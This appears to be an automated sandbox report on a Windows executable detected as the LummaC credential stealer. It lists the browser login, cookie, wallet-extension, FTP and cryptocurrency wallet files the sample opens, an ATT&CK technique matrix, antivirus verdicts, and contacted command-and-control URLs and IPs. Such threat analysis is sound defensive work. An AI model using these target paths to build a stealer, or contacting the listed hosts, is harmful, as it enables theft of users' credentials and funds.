Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior

Source: Yara match

File source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007AEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		9_2_007AEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007ADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		9_2_007ADF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	12 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	235 System Information Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	861 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	451 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	451 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Dl6wuWiQdg.exe	56%	Virustotal		Browse
Dl6wuWiQdg.exe	61%	ReversingLabs	Win32.Trojan.Symmi
Dl6wuWiQdg.exe	100%	Avira	TR/Crypt.XPACK.Gen
Dl6wuWiQdg.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://fancywaxxers.shop/apih	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api$F	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpS	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpR	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpa/	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncoded	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/hn7:C	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exeN4	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exeW	0%	Avira URL Cloud	safe
https://fancywaxxers.shop:443/api	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exeoSP&K	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpI/	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exeV	0%	Avira URL Cloud	safe
https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpE/	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php1/	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpded	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/in	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/ah	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpn	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php)/	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php%/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.112.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
fancywaxxers.shop	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
